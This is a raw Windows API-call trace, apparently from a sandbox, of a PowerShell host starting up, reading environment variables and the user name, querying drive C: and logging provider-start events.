	[0560.647] CoTaskMemAlloc (cb=0x104) returned 0x3e2be0
	[0560.647] GetEnvironmentVariableW (in: lpName="HOMEDRIVE", lpBuffer=0x3e2be0, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0560.647] CoTaskMemFree (pv=0x3e2be0) 
	[0560.648] CoTaskMemAlloc (cb=0x104) returned 0x3e2be0
	[0560.648] GetEnvironmentVariableW (in: lpName="HOMEPATH", lpBuffer=0x3e2be0, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b
	[0560.648] CoTaskMemFree (pv=0x3e2be0) 
	[0560.648] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", nBufferLength=0x105, lpBuffer=0x1cd1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFilePart=0x0) returned 0x1d
	[0560.648] SetErrorMode (uMode=0x1) returned 0x1
	[0560.648] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz"), fInfoLevelId=0x0, lpFileInformation=0x1cd400 | out: lpFileInformation=0x1cd400*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0560.648] SetErrorMode (uMode=0x1) returned 0x1
	[0560.650] GetLogicalDrives () returned 0x4
	[0560.650] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x1ccf60, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0560.651] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0560.651] SetErrorMode (uMode=0x1) returned 0x1
	[0560.652] CoTaskMemAlloc (cb=0x68) returned 0x3fa0c0
	[0560.652] CoTaskMemAlloc (cb=0x68) returned 0x3fa050
	[0560.652] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x3fa0c0, nVolumeNameSize=0x32, lpVolumeSerialNumber=0x1cd3d0, lpMaximumComponentLength=0x1cd3cc, lpFileSystemFlags=0x1cd3c8, lpFileSystemNameBuffer=0x3fa050, nFileSystemNameSize=0x32 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x1cd3d0*=0x9c354b42, lpMaximumComponentLength=0x1cd3cc*=0xff, lpFileSystemFlags=0x1cd3c8*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1
	[0560.653] CoTaskMemFree (pv=0x3fa0c0) 
	[0560.653] CoTaskMemFree (pv=0x3fa050) 
	[0560.653] SetErrorMode (uMode=0x1) returned 0x1
	[0560.653] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0560.654] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x1cd110, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0560.654] SetErrorMode (uMode=0x1) returned 0x1
	[0560.654] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x1cd370 | out: lpFileInformation=0x1cd370*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0560.654] SetErrorMode (uMode=0x1) returned 0x1
	[0560.654] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x1cd110, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0560.655] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x1ccfc0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0560.655] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0560.655] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x1ccef0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0560.655] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0560.656] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x1ccf40, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0560.656] SetErrorMode (uMode=0x1) returned 0x1
	[0560.656] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x1cd1a0 | out: lpFileInformation=0x1cd1a0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0560.656] SetErrorMode (uMode=0x1) returned 0x1
	[0560.656] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x1ccf40, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0560.656] SetErrorMode (uMode=0x1) returned 0x1
	[0560.656] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x1cd1a0 | out: lpFileInformation=0x1cd1a0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0560.657] SetErrorMode (uMode=0x1) returned 0x1
	[0560.657] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x1ccfe0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0560.657] SetErrorMode (uMode=0x1) returned 0x1
	[0560.657] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x1cd240 | out: lpFileInformation=0x1cd240*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0560.657] SetErrorMode (uMode=0x1) returned 0x1
	[0560.657] CoTaskMemAlloc (cb=0x804) returned 0x1b7ba900
	[0560.657] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b7ba900, nSize=0x1cd648 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1cd648) returned 0x1
	[0560.658] CoTaskMemFree (pv=0x1b7ba900) 
	[0560.658] CoTaskMemAlloc (cb=0x204) returned 0x3a4cf0
	[0560.658] GetUserNameW (in: lpBuffer=0x3a4cf0, pcbBuffer=0x1cd688 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x1cd688) returned 1
	[0560.658] CoTaskMemFree (pv=0x3a4cf0) 
	[0560.659] ReportEventW (hEventLog=0x1b9e0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2daf860*="FileSystem", lpRawData=0x2daf5f0) returned 1
	[0560.674] CoTaskMemAlloc (cb=0x104) returned 0x3e2be0
	[0560.674] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e2be0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0560.674] CoTaskMemFree (pv=0x3e2be0) 
	[0560.675] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccf20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0560.675] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cce70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0560.675] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cce70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0560.676] CoTaskMemAlloc (cb=0x804) returned 0x1b7ba900
	[0560.676] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b7ba900, nSize=0x1cd648 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1cd648) returned 0x1
	[0560.676] CoTaskMemFree (pv=0x1b7ba900) 
	[0560.676] CoTaskMemAlloc (cb=0x204) returned 0x3a4cf0
	[0560.676] GetUserNameW (in: lpBuffer=0x3a4cf0, pcbBuffer=0x1cd688 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x1cd688) returned 1
	[0560.677] CoTaskMemFree (pv=0x3a4cf0) 
	[0560.677] ReportEventW (hEventLog=0x1b9e0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2db50a0*="Function", lpRawData=0x2db4e30) returned 1
	[0560.685] CoTaskMemAlloc (cb=0x104) returned 0x3e2be0
	[0560.685] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e2be0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0560.685] CoTaskMemFree (pv=0x3e2be0) 
	[0562.351] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0562.351] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cce40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0562.351] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cce40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0563.712] CoTaskMemAlloc (cb=0x804) returned 0x1b7ba900
	[0563.712] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b7ba900, nSize=0x1cd648 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1cd648) returned 0x1
	[0563.713] CoTaskMemFree (pv=0x1b7ba900) 
	[0563.713] CoTaskMemAlloc (cb=0x204) returned 0x3a4cf0
	[0563.713] GetUserNameW (in: lpBuffer=0x3a4cf0, pcbBuffer=0x1cd688 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x1cd688) returned 1
	[0563.713] CoTaskMemFree (pv=0x3a4cf0) 
	[0563.713] ReportEventW (hEventLog=0x1b9e0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2dd78c8*="Registry", lpRawData=0x2dd7658) returned 1
	[0563.720] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0563.720] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cce40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0563.720] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cce40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0563.721] CoTaskMemAlloc (cb=0x804) returned 0x1b7ba900
	[0563.721] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b7ba900, nSize=0x1cd648 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1cd648) returned 0x1
	[0563.721] CoTaskMemFree (pv=0x1b7ba900) 
	[0563.721] CoTaskMemAlloc (cb=0x204) returned 0x3a4cf0
	[0563.721] GetUserNameW (in: lpBuffer=0x3a4cf0, pcbBuffer=0x1cd688 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x1cd688) returned 1
	[0563.722] CoTaskMemFree (pv=0x3a4cf0) 
	[0563.722] ReportEventW (hEventLog=0x1b9e0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2ddcce0*="Variable", lpRawData=0x2ddca70) returned 1
	[0563.758] CoTaskMemAlloc (cb=0x104) returned 0x3e2be0
	[0563.758] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e2be0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0563.758] CoTaskMemFree (pv=0x3e2be0) 
	[0563.761] CoTaskMemAlloc (cb=0x104) returned 0x3e2be0
	[0563.761] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e2be0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0563.761] CoTaskMemFree (pv=0x3e2be0) 
	[0563.763] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x1ccef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0563.764] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x1cce40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0563.764] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x1cce40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0563.764] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x1cce40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0565.563] CoTaskMemAlloc (cb=0x804) returned 0x1b7ba900
	[0565.563] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b7ba900, nSize=0x1cd648 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1cd648) returned 0x1
	[0565.564] CoTaskMemFree (pv=0x1b7ba900) 
	[0565.564] CoTaskMemAlloc (cb=0x204) returned 0x3a4cf0
	[0565.564] GetUserNameW (in: lpBuffer=0x3a4cf0, pcbBuffer=0x1cd688 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x1cd688) returned 1
	[0565.564] CoTaskMemFree (pv=0x3a4cf0) 
	[0565.565] ReportEventW (hEventLog=0x1b9e0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2df08f8*="Certificate", lpRawData=0x2df0688) returned 1
	[0565.728] CoTaskMemAlloc (cb=0x104) returned 0x3e2be0
	[0565.728] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e2be0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0565.728] CoTaskMemFree (pv=0x3e2be0) 
	[0565.731] GetLogicalDrives () returned 0x4
	[0565.731] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x1cd2d0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0565.732] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0565.733] CoTaskMemAlloc (cb=0x20e) returned 0x3dd440
	[0565.733] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x3dd440 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0565.733] CoTaskMemFree (pv=0x3dd440) 
	[0565.734] CoTaskMemAlloc (cb=0x104) returned 0x3e2be0
	[0565.734] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e2be0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0565.734] CoTaskMemFree (pv=0x3e2be0) 
	[0565.735] CoTaskMemAlloc (cb=0x104) returned 0x3e2be0
	[0565.735] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e2be0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0565.735] CoTaskMemFree (pv=0x3e2be0) 
	[0565.752] CoTaskMemAlloc (cb=0x104) returned 0x3e2be0
	[0565.752] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e2be0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0565.752] CoTaskMemFree (pv=0x3e2be0) 
	[0565.753] CoTaskMemAlloc (cb=0x104) returned 0x3e2be0
	[0565.753] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e2be0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0565.753] CoTaskMemFree (pv=0x3e2be0) 
	[0565.753] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1cd030, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0565.754] SetErrorMode (uMode=0x1) returned 0x1
	[0565.754] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x1cd290 | out: lpFileInformation=0x1cd290*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0565.754] SetErrorMode (uMode=0x1) returned 0x1
	[0565.754] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1cd030, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0565.754] SetErrorMode (uMode=0x1) returned 0x1
	[0565.754] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x1cd290 | out: lpFileInformation=0x1cd290*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0565.754] SetErrorMode (uMode=0x1) returned 0x1
	[0565.754] CoTaskMemAlloc (cb=0x104) returned 0x3e2be0
	[0565.754] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e2be0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0565.754] CoTaskMemFree (pv=0x3e2be0) 
	[0565.756] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1cd1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0565.758] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1cd2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0565.758] SetErrorMode (uMode=0x1) returned 0x1
	[0565.759] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x1cd550 | out: lpFileInformation=0x1cd550*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0565.759] SetErrorMode (uMode=0x1) returned 0x1
	[0566.991] CoTaskMemAlloc (cb=0x804) returned 0x1b7ba900
	[0566.991] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b7ba900, nSize=0x1cd8b8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1cd8b8) returned 0x1
	[0566.992] CoTaskMemFree (pv=0x1b7ba900) 
	[0566.992] CoTaskMemAlloc (cb=0x204) returned 0x3a4cf0
	[0566.992] GetUserNameW (in: lpBuffer=0x3a4cf0, pcbBuffer=0x1cd8f8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x1cd8f8) returned 1
	[0566.992] CoTaskMemFree (pv=0x3a4cf0) 
	[0566.994] ReportEventW (hEventLog=0x1b9e0008, wType=0x4, wCategory=0x4, dwEventID=0x190, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2e295e0*="Available", lpRawData=0x2e29370) returned 1
	[0568.390] CoTaskMemAlloc (cb=0x104) returned 0x3e2be0
	[0568.390] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e2be0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0568.390] CoTaskMemFree (pv=0x3e2be0) 
	[0568.392] CoTaskMemAlloc (cb=0x104) returned 0x3e2be0
	[0568.392] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e2be0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0568.392] CoTaskMemFree (pv=0x3e2be0) 
	[0568.394] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0568.394] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0568.394] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0568.398] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd340, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0568.398] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd290, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0568.398] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd290, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0568.399] CoTaskMemAlloc (cb=0x104) returned 0x3e2be0
	[0568.399] GetEnvironmentVariableW (in: lpName="HomeDrive", lpBuffer=0x3e2be0, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0568.399] CoTaskMemFree (pv=0x3e2be0) 
	[0568.399] CoTaskMemAlloc (cb=0x104) returned 0x3e2be0
	[0568.399] GetEnvironmentVariableW (in: lpName="HomePath", lpBuffer=0x3e2be0, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b
	[0568.399] CoTaskMemFree (pv=0x3e2be0) 
